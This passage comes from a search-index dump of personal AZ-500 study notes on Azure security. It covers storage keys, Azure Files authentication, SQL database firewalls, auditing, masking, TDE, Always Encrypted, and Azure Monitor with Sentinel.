        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#37-storage-account-keys","title":"3.7. Storage Account Keys","text":"

        Generated by Azure when creating the storage account. Azure generates 2 keys of 512-BITS. You use these keys to authorize access to data that resides in your storage account via Shared Key authorization. Azure KeyVault simplefies this process and allows your to perform the rotation of keys without interrupting the applications.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#38-configure-azure-files-authentication","title":"3.8. Configure Azure files authentication","text":"

        Azure Files supports identity-based authentication over Server Message Block (SMB) through on-premises Active Directory Domain Services (AD DS) and Microsoft Entra Domain Services (Microsoft Entra Domain Services). With RBAC, the credentials you use for file access should be available or synced to Microsoft Entra ID.

        Azure Files enforces authorization on user access to both the share and the directory/file levels.

        At the directory/file level, Azure Files supports preserving, inheriting, and enforcing Windows DACLs just like any Windows file servers. You can choose to keep Windows DACLs when copying data over SMB between your existing file share and your Azure file shares. Whether you plan to enforce authorization or not, you can use Azure file shares to back up ACLs along with your data.

        Benefits of Identity-based authentication over using Shared Key authentication:

        • Extend the traditional identity-based file share access experience to the cloud with on-premises AD DS and Microsoft Entra Domain Services.
        • Enforce granular access control on Azure file shares.
        • Back up Windows ACLs (also known as NTFS) along with your data. You can copy ACLs on a directory or file to Azure file shares using either Azure File Sync or common file movement toolsets. For example, you can use robocopy with the /copy:s flag to copy data as well as ACLs to an Azure file share. ACLs are preserved by default, you are not required to enable identity-based authentication on your storage account to preserve ACLs.

        How it works:

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#39-enable-the-secure-transfer-required-property","title":"3.9. Enable the secure transfer required property","text":"

        You can configure your storage account to accept requests from secure connections only by setting the Secure transfer required property for the storage account. When you require secure transfer, any requests originating from an insecure connection are rejected. Microsoft recommends that you always require secure transfer for all of your storage accounts.

        Connecting to an Azure File share over SMB without encryption fails when secure transfer is required for the storage account. Examples of insecure connections include those made over SMB 2.1, SMB 3.0 without encryption, or some versions of the Linux SMB client. Azure Files connections require encryption (SMB)

        By default, the Secure transfer required property is enabled when you create a storage account. Azure Storage doesn't support HTTPS for\u00a0custom domain names, this option is not applied when you're using a custom domain name.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#4-sql-database-security","title":"4. SQL database security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#41-sql-database-authentication","title":"4.1. SQL database authentication","text":"

        A user is authenticated using one of the following two authentication methods:

        • SQL authentication\u00a0- With this authentication method, the user submits a user account name and associated password to establish a connection. This password is stored in the master database for user accounts linked to a login or stored in the database containing the user accounts not linked to a login.
        • Microsoft Entra authentication\u00a0- With this authentication method, the user submits a user account name and requests that the service use the credential information stored in Microsoft Entra ID.

        You can create user accounts in the master database, and grant permissions in all databases on the server, or you can create them in the database itself (called contained database users). By using contained databases, you obtain enhance portability and scalability.

        Logins and users: In Azure SQL, a user account in a database can be associated with a login that is stored in the master database or can be a user name that is stored in an individual database.

        • A\u00a0login\u00a0is an individual account in the master database, to which a user account in one or more databases can be linked. With a login, the credential information for the user account is stored with the login.
        • A\u00a0user account\u00a0is an individual account in any database that may be but does not have to be linked to a login. With a user account that is not linked to a login, the credential information is stored with the user account.

        Authorization\u00a0to access data and perform various actions are managed using database roles and explicit permissions. \u00a0Authorization is controlled by your user account's database role memberships and object-level permissions.

        Best practices: - you should grant users the least privileges necessary. - your application should use a dedicated account to authenticate. - Recommendation: to create a contained database user, which allows your app to authenticate directly to the database.

        Use Microsoft Entra authentication to centrally manage identities of database users and as an alternative to SQL Server authentication.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#42-configure-sql-database-firewalls","title":"4.2. Configure SQL database firewalls","text":"

        Azure SQL Database and Azure Synapse Analytics, previously SQL Data Warehouse, (both referred to as SQL Database in this lesson) provide a relational database service for Azure and other internet-based applications.

        Initially, all access to your Azure SQL Database is blocked by the SQL Database firewall.

        The firewall grants access to databases based - on the originating IP address of each request. - on virtual network rules based on virtual network service endpoints. Virtual network rules might be preferable to IP rules in some cases.

        Azure SQL Firewall IP Rules: - Server-level IP firewall rules allow clients to access the entire Azure SQL server, which includes all databases hosted in it. The master database holds these rules. You can configure a maximum of 128 server-level IP firewall rules for an Azure SQL server. You can configure server-level IP firewall rules using the Azure portal, PowerShell, or by using Transact-SQL statements. To create server-level IP firewall rules using the Azure portal or PowerShell, you must be the subscription owner or a subscription contributor. To create a server-level IP firewall rule using Transact-SQL, you must connect to the SQL Database instance as the server-level principal login or the Microsoft Entra administrator (which means that a server-level IP firewall rule must have first been created by a user with Azure-level permissions). - Database-level IP firewall rules are used to allow access to specific databases on a SQL Database server. You can create them for each database, included the master database. Also, there is a maximum of 128 rules. ou can only create and manage database-level IP firewall rules for master databases and user databases by using Transact-SQL statements, and only after you have configured the first server-level firewall.

        Azure Synapse Analytics only supports server-level IP firewall rules, and not database-level IP firewall rules.

        Data-level Firewall rules get evaluated first:

        To allow applications from Azure to connect to your Azure SQL Database, Azure connections must be enabled. When an application from Azure attempts to connect to your database server, the firewall verifies that Azure connections are allowed. A firewall setting with starting and ending addresses equal to 0.0.0.0 indicates Azure connections are allowed. This option configures the firewall to allow all connections from Azure including connections from the subscriptions of other customers. When selecting this option, make sure your sign-in and user permissions limit access to authorized users only.

        Whenever possible, as a best practice, use database-level IP firewall rules to enhance security and to make your database more portable. Use server-level IP firewall rules for administrators and when you have several databases with the same access requirements, and you don't want to spend time configuring each database individually.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#43-enable-and-monitor-database-auditing","title":"4.3. Enable and monitor database auditing","text":"

        Auditing for Azure SQL Database and Azure Synapse Analytics tracks database events and writes them to an audit log in your Azure storage account, Log Analytics workspace or Event Hubs.

        Auditing also:

        • Helps you maintain regulatory compliance, understand database activity, and gain insight into discrepancies and anomalies that could indicate business concerns or suspected security violations.
        • Enables and facilitates adherence to compliance standards, although it\u00a0doesn't guarantee compliance.

        You can use SQL database auditing to:

        • Retain\u00a0an audit trail of selected events. You can define categories of database actions to be audited.
        • Report\u00a0on database activity. You can use pre-configured reports and a dashboard to get started quickly with activity and event reporting.
        • Analyze\u00a0reports. You can find suspicious events, unusual activity, and trends.

        In auditing, server-level auditing policies take precedence over database-label auditing policies. This means that:

        • A server policy applies to all existing and newly created databases on the server.
        • If server auditing is enabled, it always applies to the database. The database will be audited, regardless of the database auditing settings.
        • Enabling auditing on the database or data warehouse, in addition to enabling it on the server, does not override or change any of the settings of the server auditing. Both audits will exist side by side. In other words, the database is audited twice in parallel; once by the server policy and once by the database policy.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#44-implement-data-discovery-and-classification","title":"4.4. Implement data discovery and classification","text":"

        Data discovery and classification provides advanced capabilities built into Azure SQL Database for discovering, classifying, labeling and protecting sensitive data (such as business, personal data, and financial information) in your databases. Discovering and classifying this data can play a pivotal role in your organizational information protection stature. It can serve as infrastructure for:

        • Helping meet data privacy standards and regulatory compliance requirements.
        • Addressing various security scenarios such as monitoring, auditing, and alerting on anomalous access to sensitive data.
        • Controlling access to and hardening the security of databases containing highly sensitive data.

        Data exists in one of three basic states: at\u00a0rest, in\u00a0process, and in\u00a0transit. All three states require unique technical solutions for data classification, but the applied principles of data classification should be the same for each. Data that is classified as confidential needs to stay confidential when at rest, in process, or in transit.

        Data can also be either\u00a0structured\u00a0or\u00a0unstructured. Typical classification processes for structured data found in databases and spreadsheets are less complex and time-consuming to manage than those for unstructured data such as documents, source code, and email. Generally, organizations will have more unstructured data than structured data.

        Protect data at rest

        Best practice Solution Apply disk encryption to help safeguard your data. Use Microsoft Azure Disk Encryption, which enables IT administrators to encrypt both Windows infrastructure as a service (IaaS) and Linux IaaS virtual machine (VM) disks. Disk encryption combines the industry-standard BitLocker feature and the Linux DM-Crypt feature to provide volume encryption for the operating system (OS) and the data disks. \u200eAzure Storage and Azure SQL Database encrypt data at rest by default, and many services offer encryption as an option. You can use Azure Key Vault to maintain control of keys that access and encrypt your data. Use encryption to help mitigate risks related to unauthorized data access. Encrypt your drives before you write sensitive data to them.

        Protect data in transit

        We generally recommend that you always use SSL/TLS protocols to exchange data across different locations. . In some circumstances, you might want to isolate the entire communication channel between your on-premises and cloud infrastructures by using a VPN. For data moving between your on-premises infrastructure and Azure, consider appropriate safeguards such as HTTPS or VPN. When sending encrypted traffic between an Azure virtual network and an on-premises location over the public internet, use Azure VPN Gateway.

        Best practice Solution Secure access from multiple workstations located on-premises to an Azure virtual network Use site-to-site VPN. Secure access from an individual workstation located on-premises to an Azure virtual network Use point-to-site VPN. Move larger data sets over a dedicated high-speed wide area network (WAN) link Use Azure ExpressRoute. If you choose to use ExpressRoute, you can also encrypt the data at the application level by using SSL/TLS or other protocols for added protection. Interact with Azure Storage through the Azure portal All transactions occur via HTTPS. You can also use Storage REST API over HTTPS to interact with Azure Storage and Azure SQL Database.

        Data discovery and classification is part of the Advanced Data Security offering, which is a unified package for advanced Microsoft SQL Server security capabilities. You access and manage data discovery and classification via the central SQL Advanced Data Security portal.

        • Discovery and recommendations\u00a0- The classification engine scans your database and identifies columns containing potentially sensitive data. It then provides you with an easier way to review and apply the appropriate classification recommendations via the Azure portal.
        • Labeling\u00a0- Sensitivity classification labels can be persistently tagged on columns using new classification metadata attributes introduced into the SQL Server Engine. This metadata can then be utilized for advanced sensitivity-based auditing and protection scenarios.
        • Information Types\u00a0- These provide additional granularity into the type of data stored in the column.
        • Query result set sensitivity\u00a0- The sensitivity of the query result set is calculated in real time for auditing purposes.
        • Visibility\u00a0- You can view the database classification state in a detailed dashboard in the Azure portal. Additionally, you can download a report (in Microsoft Excel format) that you can use for compliance and auditing purposes, in addition to other needs.

        SQL data discovery and classification comes with a built-in set of sensitivity labels and information types, and discovery logic. You can now customize this taxonomy and define a set and ranking of classification constructs specifically for your environment. Definition and customization of your classification taxonomy takes place in one central location for your entire Azure Tenant. That location is in Microsoft Defender for Cloud, as part of your Security Policy. Only a user with administrative rights on the Tenant root management group can perform this task.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#45-microsoft-defender-for-sql","title":"4.5. Microsoft Defender for SQL","text":"

        Applies to:\u00a0Azure SQL Database\u00a0|\u00a0Azure SQL Managed Instance\u00a0|\u00a0Azure Synapse Analytics

        Microsoft Defender for SQL includes functionality for surfacing and mitigating potential database vulnerabilities and detecting anomalous activities that could indicate a threat to your database. It provides a single go-to location for enabling and managing these capabilities.

        Microsoft Defender for SQL provides:

        • Vulnerability Assessment is an easy-to-configure service that can discover, track, and help you remediate potential database vulnerabilities. It provides visibility into your security state, and it includes actionable steps to resolve security issues and enhance your database fortifications.
        • Advanced Threat Protection detects anomalous activities indicating unusual and potentially harmful attempts to access or exploit your database. It continuously monitors your database for suspicious activities, and it provides immediate security alerts on potential vulnerabilities, Azure SQL injection attacks, and anomalous database access patterns. Advanced Threat Protection alerts provide details of suspicious activity and recommend action on how to investigate and mitigate the threat.

        Enabling or managing Microsoft Defender for SQL settings requires belonging to the SQL security manager role or one of the database or server admin roles.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#vulnerability-assessment-for-sql-server","title":"Vulnerability assessment for SQL Server","text":"

        Applies to: Azure SQL Database\u00a0|\u00a0Azure SQL Managed Instance\u00a0|\u00a0Azure Synapse Analytics

        • Vulnerability assessment is a scanning service built into Azure SQL Database.
        • The service employs a knowledge base of rules that flag security vulnerabilities.
        • These rules cover database-level issues and server-level security issues, like server firewall settings and server-level permissions. - Permission configurations. - Feature configurations. - Database settings
        • The results of the scan include actionable steps to resolve each issue and provide customized remediation scripts where applicable.
        • Vulnerability assessment is part of Microsoft Defender for Azure SQL, which is a unified package for advanced SQL security capabilities. Vulnerability assessment can be accessed and managed from each SQL database resource in the Azure portal.

        SQL vulnerability assessment express and classic configurations. - You can configure vulnerability assessment for your SQL databases with either:

        • Express configuration (preview) \u2013 The default procedure that lets you configure vulnerability assessment without dependency on external storage to store baseline and scan result data.
        • Classic configuration \u2013 The legacy procedure that requires you to manage an Azure storage account to store baseline and scan result data.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#46-sql-advanced-threat-protection","title":"4.6. SQL Advanced Threat Protection","text":"

        Applies to: Azure SQL Database | Azure SQL Managed Instance | Azure Synapse Analytics | SQL Server on Azure Virtual Machines | Azure Arc-enabled SQL Server

        • SQL Advanced Threat Protection detects anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases.
        • Users receive an alert upon suspicious database activities, potential vulnerabilities, and SQL injection attacks, as well as anomalous database access and queries patterns.
        • Advanced Threat Protection integrates alerts with Microsoft Defender for Cloud.
        • For a full investigation experience, it is recommended to enable auditing, which writes database events to an audit log in your Azure storage account.
        • Click\u00a0the\u00a0Advanced Threat Protection alert\u00a0to launch the Microsoft Defender for Cloud alerts page and get an overview of active SQL threats detected on the database.
        • Advanced Threat Protection is part of the Microsoft Defender for SQL offering, which is a unified package for advanced SQL security capabilities. Advanced Threat Protection can be accessed and managed via the central Microsoft Defender for SQL portal.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#47-sql-database-dynamic-data-masking-ddm","title":"4.7. SQL Database Dynamic Data Masking (DDM)","text":"

        Dynamic data masking helps prevent unauthorized access to sensitive data by enabling customers to designate how much of the sensitive data to reveal with minimal impact on the application layer. You set up a dynamic data masking policy in the Azure portal by selecting the dynamic data masking operation in your SQL Database configuration blade or settings blade. This feature cannot be set by using portal for Azure Synapse

        Configuring DDM policy. -

        • SQL users excluded from masking\u00a0- A set of SQL users or Microsoft Entra identities that get unmasked data in the SQL query results. Users with administrator privileges are always excluded from masking, and view the original data without any mask.
        • Masking rules\u00a0- A set of rules that define the designated fields to be masked and the masking function that is used. The designated fields can be defined using a database schema name, table name, and column name.
        • Masking functions\u00a0- A set of methods that control the exposure of data for different scenarios.

        The DDM recommendations engine, flags certain fields from your database as potentially sensitive fields, which may be good candidates for masking. In the Dynamic Data Masking blade in the portal, you can review the recommended columns for your database. All you need to do is click\u00a0Add Mask\u00a0for one or more columns and then\u00a0Save\u00a0to apply a mask for these fields.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#48-implement-transparent-data-encryption-tde","title":"4.8. Implement Transparent Data Encryption (TDE)","text":"
        • Applies to Azure SQL Database | Azure SQL Managed Instance | Synapse SQL in Azure Synapse Analytics.
        • To configure TDE through the Azure portal, you must be connected as the Azure Owner, Contributor, or SQL Security Manager.
        • Encrypts data at rest.
        • It performs real-time encryption and decryption of the database, associated backups, and transaction log files at rest without requiring changes to the application.
        • By default, TDE is enabled for all newly deployed Azure SQL databases\u00a0and needs to be manually enabled for older databases of Azure SQL Database, Azure SQL Managed Instance, or Azure Synapse.
        • It cannot be used to encrypt the logical master database because this db contains objects that TDE needs to perform the encrypt/decrypt operations.
        • TDE encrypts the storage of an entire database by using a symmetric key called the Database Encryption Key (DEK).
        • DEK is protected by the TDE protector. Where is this TDE protector set?:
          • At the logical SQL server level: For Azure SQL Database and Azure Synapse, the TDE protector is set at the logical SQL server level and is inherited by all databases associated with that server.
          • At the instance level: For Azure SQL Managed Instance (BYOK feature in preview), the TDE protector is set at the instance level and it is inherited by all encrypted databases on that instance.

        TDE protector is either a service-managed certificate (service-managed transparent data encryption) or an asymmetric key stored in Azure Key Vault (customer-managed transparent data encryption)

        • The default setting for TDE is that the DEK is protected by a built-in server certificate.
          • If two databases are connected to the same server, they also share the same built-in certificate.
          • The built-in server certificate is unique for each server and the encryption algorithm used is AES 256.
          • Microsoft automatically rotates these certificates. Additionally, Microsoft seamlessly moves and manages the keys as needed for geo-replication and restores.
          • the root key is protected by a Microsoft internal secret store.
        • With Customer-managed TDE or Bring Your Own Key (BYOK), \u00a0the TDE Protector that encrypts the DEK is a customer-managed asymmetric key, which is stored in a customer-owned and managed Azure Key Vault (Azure's cloud-based external key management system) and never leaves the key vault.
          • The TDE Protector can be generated by the key vault or transferred to the key vault from an on premises hardware security module (HSM) device.
          • SQL Database needs to be granted permissions to the customer-owned key vault to decrypt and encrypt the DEK.
          • With TDE with Azure Key Vault integration, users can control key management tasks including key rotations, key vault permissions, key backups, and enable auditing/reporting on all TDE protectors using Azure Key Vault functionality.

        Turn on and off TDE from Azure portal.

        Except for Azure SQL Managed Instance, there you need to use T-SQL to turn TDE on and off on a database.

        Transact-SQL (T-SQL) is an extension of the standard SQL (Structured Query Language) used for querying and managing relational databases, particularly in the context of Microsoft SQL Server and Azure SQL Database. It is needed and used for the following reasons: 1. Procedural Capabilities: T-SQL includes procedural programming constructs such as variables, loops, and conditional statements, which are not part of standard SQL. 2. SQL Server Specific Functions: T-SQL includes functions and features that are specific to SQL Server and may not be supported by other database management systems. 3. System Management: T-SQL provides commands and procedures for managing SQL Server instances, databases, and security, which are not part of the standard SQL language. 4. Error Handling: T-SQL has error handling mechanisms like TRY...CATCH blocks, which are not part of the standard SQL syntax.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#49-azure-sql-always-encrypted","title":"4.9. Azure SQL Always Encrypted","text":"

        Always Encrypted helps protect sensitive data at rest on the server, during movement between client and server, and while the data is in use. Always Encrypted ensures that sensitive data never appears as plaintext inside the database system. After you configure data encryption, only client applications or app servers that have access to the keys can access plaintext data. Always Encrypted uses the AEAD_AES_256_CBC_HMAC_SHA_256 algorithm to encrypt data in the database.

        Always Encrypted allows clients to encrypt sensitive data inside client applications and never reveal the encryption keys to the Database Engine (SQL Database or SQL Server).

        An example: Client On-Premises with Data in Azure __ A customer has an on-premises client application at their business location. The application operates on sensitive data stored in a database hosted in Azure (SQL Database or SQL Server running in a virtual machine on Microsoft Azure). The customer uses Always Encrypted and stores Always Encrypted keys in a trusted key store hosted on-premises, to ensure Microsoft cloud administrators have no access to sensitive data. Client and Data in Azure __ A customer has a client application, hosted in Microsoft Azure (for example, in a worker role or a web role), which operates on sensitive data stored in a database hosted in Azure (SQL Database or SQL Server running in a virtual machine on Microsoft Azure). Although Always Encrypted does not provide complete isolation of data from cloud administrators, as both the data and keys are exposed to cloud administrators of the platform hosting the client tier, the customer still benefits from reducing the security attack surface area (the data is always encrypted in the database).

        The Always Encrypted-enabled driver automatically encrypts and decrypts sensitive data in the client application before sending the data off to the SQL server. Always Encrypted supports two types of encryption: randomized encryption and deterministic encryption.

        • Deterministic encryption\u00a0always generates the same encrypted value for any given plain text value. Using deterministic encryption allows point lookups, equality joins, grouping and indexing on encrypted columns. However, it may also allow unauthorized users to guess information about encrypted values by examining patterns in the encrypted column, especially if there is a small set of possible encrypted values, such as True/False, or North/South/East/West region. Deterministic encryption must use a column collation with a binary2 sort order for character columns.
        • Randomized encryption\u00a0uses a method that encrypts data in a less predictable manner. Randomized encryption is more secure, but prevents searching, grouping, indexing, and joining on encrypted columns.

        Available is all editions of Azure SQL Database starting with SQL Server 2016.

        Deploy an always encrypted implementation. -

        The initial setup of Always Encrypted in a database involves generating Always Encrypted keys, creating key metadata, configuring encryption properties of selected database columns, and/or encrypting data that may already exist in columns that need to be encrypted.

        Some of these tasks aren't supported in Transact-SQL. You can use SQL Server Management Studio (SSMS) or PowerShell to accomplish such tasks.

        Task SSMS PowerShell SQL Provisioning column master keys, column encryption keys and encrypted column encryption keys with their corresponding column master keys Yes Yes No Creating key metadata in the database Yes Yes Yes Creating new tables with encrypted columns Yes Yes Yes Encrypting existing data in selected database columns Yes Yes No

        When setting up encryption for a column, you specify the information about the encryption algorithm and cryptographic keys used to protect the data in the column. Always Encrypted uses two types of keys: column encryption keys and column master keys. A column encryption key is used to encrypt data in an encrypted column. A column master key is a key-protecting key that encrypts one or more column encryption keys.

        The Database Engine stores encryption configuration for each column in database metadata. Note, however, the Database Engine never stores or uses the keys of either type in plaintext. It only stores encrypted values of column encryption keys and the information about the location of column master keys, which are stored in external trusted key stores, such as Azure Key Vault, Windows Certificate Store on a client machine, or a hardware security module.

        To access data stored in an encrypted column in plaintext, an application must use an Always Encrypted enabled client driver. When an application issues a parameterized query, the driver transparently collaborates with the Database Engine to determine which parameters target encrypted columns and, thus, should be encrypted. For each parameter that needs to be encrypted, the driver obtains the information about the encryption algorithm and the encrypted value of the column encryption key for the column, the parameter targets, as well as the location of its corresponding column master key.

        Next, the driver contacts the key store, containing the column master key, in order to decrypt the encrypted column encryption key value and then, it uses the plaintext column encryption key to encrypt the parameter. The resultant plaintext column encryption key is cached to reduce the number of round trips to the key store on subsequent uses of the same column encryption key. The driver substitutes the plaintext values of the parameters targeting encrypted columns with their encrypted values, and it sends the query to the server for processing.

        The server computes the result set, and for any encrypted columns included in the result set, the driver attaches the encryption metadata for the column, including the information about the encryption algorithm and the corresponding keys. The driver first tries to find the plaintext column encryption key in the local cache, and only makes a round to the column master key if it can't find the key in the cache. Next, the driver decrypts the results and returns plaintext values to the application.

        A client driver interacts with a key store, containing a column master key, using a column master key store provider, which is a client-side software component that encapsulates a key store containing the column master key. Providers for common types of key stores are available in client-side driver libraries from Microsoft or as standalone downloads. You can also implement your own provider. Always Encrypted capabilities, including built-in column master key store providers vary by a driver library and its version.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/","title":"IV. Security operation","text":"Sources of this notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023)
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        100 questions you should pass for the AZ-500 certificate

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#1-configure-and-manage-azure-monitor","title":"1. Configure and manage Azure Monitor","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#11-exploring-azure-monitor","title":"1.1. Exploring Azure Monitor","text":"

        Exporting data to a SIEM

        Azure Monitor offers a consolidated pipeline for routing any of your monitoring data into a SIEM tool. This is done by streaming that data to an event hub, where it can then be pulled into a partner tool. This pipe uses the Azure Monitor single pipeline for getting access to the monitoring data from your Azure environment. Currently, the exposed security data from Microsoft Defender for Cloud to a SIEM consists of security alerts.

        Microsoft Defender for Cloud security alerts Microsoft Defender for Cloud automatically collects, analyzes, and integrates log data from your Azure resources; the network; and connected partner solutions.

        Azure Event Hubs Azure Event Hubs is a streaming platform and event ingestion service that can transform and store data by using any real-time analytics provider or batching/storage adapters. Use Event Hubs to stream log data from Azure Monitor to a Microsoft Sentinel or a partner SIEM and monitoring tools. What data can be sent into an event hub? Within your Azure environment, there are several 'tiers' of monitoring data, and the method of accessing data from each tier varies slightly.

        • Application monitoring data\u00a0- Data about the performance and functionality of the code you have written and are running on Azure. Examples of application monitoring data include performance traces, application logs, and user telemetry. Application monitoring data is usually collected in one of the following ways:
          • By instrumenting your code with an SDK such as the\u00a0Application Insights SDK.
          • By running a monitoring agent that listens for new application logs on the machine running your application, such as the\u00a0Windows Azure Diagnostic Agent\u00a0or\u00a0Linux Azure Diagnostic Agent.
        • Guest OS monitoring data\u00a0- Data about the operating system on which your application is running. Examples of guest OS monitoring data would be Linux syslog or Windows system events. To collect this type of data, you need to install an agent such as the\u00a0Windows Azure Diagnostic Agent\u00a0or\u00a0Linux Azure Diagnostic Agent.
        • Azure resource monitoring data\u00a0- Data about the operation of an Azure resource. For some Azure resource types, such as virtual machines, there is a guest OS and application(s) to monitor inside of that Azure service. For other Azure resources, such as Network Security Groups, the resource monitoring data is the highest tier of data available (since there is no guest OS or application running in those resources). This data can be collected using resource diagnostic settings.
        • Azure subscription monitoring data\u00a0- Data about the operation and management of an Azure subscription, as well as data about the health and operation of Azure itself. The activity log contains most subscription monitoring data, such as service health incidents and Azure Resource Manager audits. You can collect this data using a Log Profile.
        • Azure tenant monitoring data\u00a0- Data about the operation of tenant-level Azure services, such as Microsoft Entra ID. The Microsoft Entra audits and sign-ins are examples of tenant monitoring data. This data can be collected using a tenant diagnostic setting.

        Some of the features of Microsoft Sentinel are:

        • More than 100 built-in alert rules
          • Sentinel's alert rule wizard to create your own.
          • Alerts can be triggered by a single event or based on a threshold, or by correlating different datasets or by using built-in machine learning algorithms.
        • Jupyter Notebooks\u00a0that use a growing collection of hunting queries, exploratory queries, and python libraries.
        • Investigation graph\u00a0for visualizing and traversing the connections between entities like users, assets, applications, or URLs and related activities like logins, data transfers, or application usage to rapidly understand the scope and impact of an incident.

        To on-board Microsoft Sentinel: - Enable it - Connect your data sources with connectors that include Microsoft Threat Protection solutions,\u00a0Microsoft 365 sources, Microsoft Entra ID, Azure ATP, and\u00a0Microsoft Cloud App Security. In addition, there are built-in connectors to the broader security ecosystem for non-Microsoft solutions. You can also use common event format, Syslog or REST-API to connect your data sources with Azure Sentinel. - After you connect your data sources, choose from a gallery of expertly created dashboards that surface insights based on your data.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#12-configure-and-monitor-metrics-and-logs","title":"1.2. Configure and monitor metrics and logs","text":"

        All data that Azure Monitor collects fits into one of two fundamental types:\u00a0metrics or logs.

        Azure Monitor Metrics. - Metrics are numerical values that are collected at regular intervals and describe some aspect of a system at a particular time. There are multiple types of metrics supported by Azure Monitor Metrics:

        • Native metrics\u00a0use tools in Azure Monitor for analysis and alerting.
          • Platform metrics are collected from Azure resources. They require no configuration and have no cost.
          • Custom metrics are collected from different sources that you configure, including applications and agents running on virtual machines.
        • Prometheus metrics\u00a0(preview) are collected from Kubernetes clusters, including Azure Kubernetes Service (AKS), and use industry-standard tools for analyzing and alerting, such as PromQL and Grafana.

        What is Prometheus?\u00a0Prometheus is an\u00a0open-source toolkit\u00a0that\u00a0collects data\u00a0for\u00a0monitoring\u00a0and\u00a0alerting.

        Prometheus Features:

        • A multi-dimensional data model with time series data identified by metric name and key/value pairs
        • PromQL (PromQL component called Prom Kubernetes - an extension to support Prometheus) provides a flexible query language to use this dimensionality.
        • Time series collection happens via a pull model over Hypertext Transfer Protocol (HTTP)
        • Pushing time series is supported via an intermediary gateway
        • Targets are discovered via service discovery or static configuration

        What is Azure Managed Grafana?

        Azure Managed Grafana is a data visualization platform built on top of the Grafana software by Grafana Labs. It's built as a fully managed Azure service operated and supported by Microsoft. Grafana helps you combine metrics, logs, and traces into a single user interface. With its extensive support for data sources and graphing capabilities, you can view and analyze your application and infrastructure telemetry data in real-time.

        Azure Managed Grafana\u00a0is optimized for the Azure environment. It works seamlessly with many Azure services. Specifically, for the current preview, it provides with the following integration features:

        • Built-in support for Azure Monitor and Azure Data Explorer
        • User authentication and access control using Microsoft Entra identities
        • Direct import of existing charts from the Azure portal

        Why use Azure Managed Grafana?

        Managed Grafana\u00a0lets you bring together all your telemetry data into one place. It can access various data sources supported, including your data stores in Azure and elsewhere.

        As a fully managed service, Azure Managed Grafana lets you deploy Grafana without having to deal with setup. The service provides high availability, service level agreement (SLA) guarantees, and automatic software updates.

        You can share Grafana dashboards with people inside and outside your organization and allow others to join in for monitoring or troubleshooting. Managed Grafana uses\u00a0Microsoft Entra ID\u2019s centralized identity management, which allows you to control which users can use a Grafana instance, and you can use managed identities to access Azure data stores, such as Azure Monitor.

        You can create dashboards instantaneously by importing existing charts directly from the Azure portal or by using prebuilt dashboards.

        Summarizing:

        Category Native platform metrics Native custom metrics Prometheus metrics\u00a0(preview) Sources Azure resources Azure Monitor agent Application Insights Representational State Transfer (REST) Application Programming Interface (API) Azure Kubernetes Service (AKS) cluster Any Kubernetes cluster through remote-write Configuration None Varies by source Enable Azure Monitor managed service for Prometheus Stored Subscription Subscription Azure Monitor workspace Cost No Yes Yes (free during preview) Aggregation pre-aggregated pre-aggregated raw data Analyze Metrics Explorer Metrics Explorer Prometheus Querying (PromQL) LanguageGrafana dashboards Alert metrics alert rule metrics alert rule Prometheus alert rule Visualize WorkbooksAzure dashboardGrafana WorkbooksAzure dashboardGrafana Grafana Retrieve Azure Command-Line Interface (CLI) Azure PowerShell cmdletsRepresentational State Transfer (REST) Application Programming Interface (API) or client library.NETGoJavaJavaScriptPython Azure Command-Line Interface (CLI) Azure PowerShell cmdletsRepresentational State Transfer (REST) Application Programming Interface (API) or client library.NETGoJavaJavaScriptPython Grafana

        Azure Monitor collects metrics from the following sources. After these metrics are collected in the Azure Monitor metric database, they can be evaluated together regardless of their source:

        • Azure resources:\u00a0Platform metrics are created by Azure resources and give you visibility into their health and performance. Each type of resource creates a distinct set of metrics without any configuration required. Platform metrics are collected from Azure resources at a one-minute frequency unless specified otherwise in the metric's definition.
        • Applications:\u00a0Application Insights creates metrics for your monitored applications to help you detect performance issues and track trends in how your application is used. Values include Server response time and Browser exceptions.
        • Virtual machine agents:\u00a0Metrics are collected from the guest operating system of a virtual machine. You can enable guest operating system (OS) metrics for Windows virtual machines using the Windows diagnostic extension and Linux virtual machines by using the InfluxData Telegraf agent.
